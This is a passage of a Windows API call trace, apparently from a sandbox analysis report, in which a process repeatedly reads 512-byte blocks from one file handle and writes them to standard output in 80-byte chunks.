lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: 
hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.807] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.807] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.808] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.809] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, 
lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.809] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.810] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.810] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.810] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 
0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.811] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.811] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] GetFileType (hFile=0x50) returned 0x1 [0225.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.811] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) 
returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0225.812] GetFileType (hFile=0x50) returned 0x1 [0225.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.812] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.812] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.813] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.813] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] GetFileType (hFile=0x50) returned 0x1 [0225.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.813] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.814] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.814] ReadFile 
(in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] GetFileType (hFile=0x50) returned 0x1 [0225.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.814] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] GetFileType (hFile=0x50) returned 0x1 [0225.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.815] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.816] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.816] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, 
lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] GetFileType (hFile=0x50) returned 0x1 [0225.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.816] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.816] _get_osfhandle (_FileHandle=1) 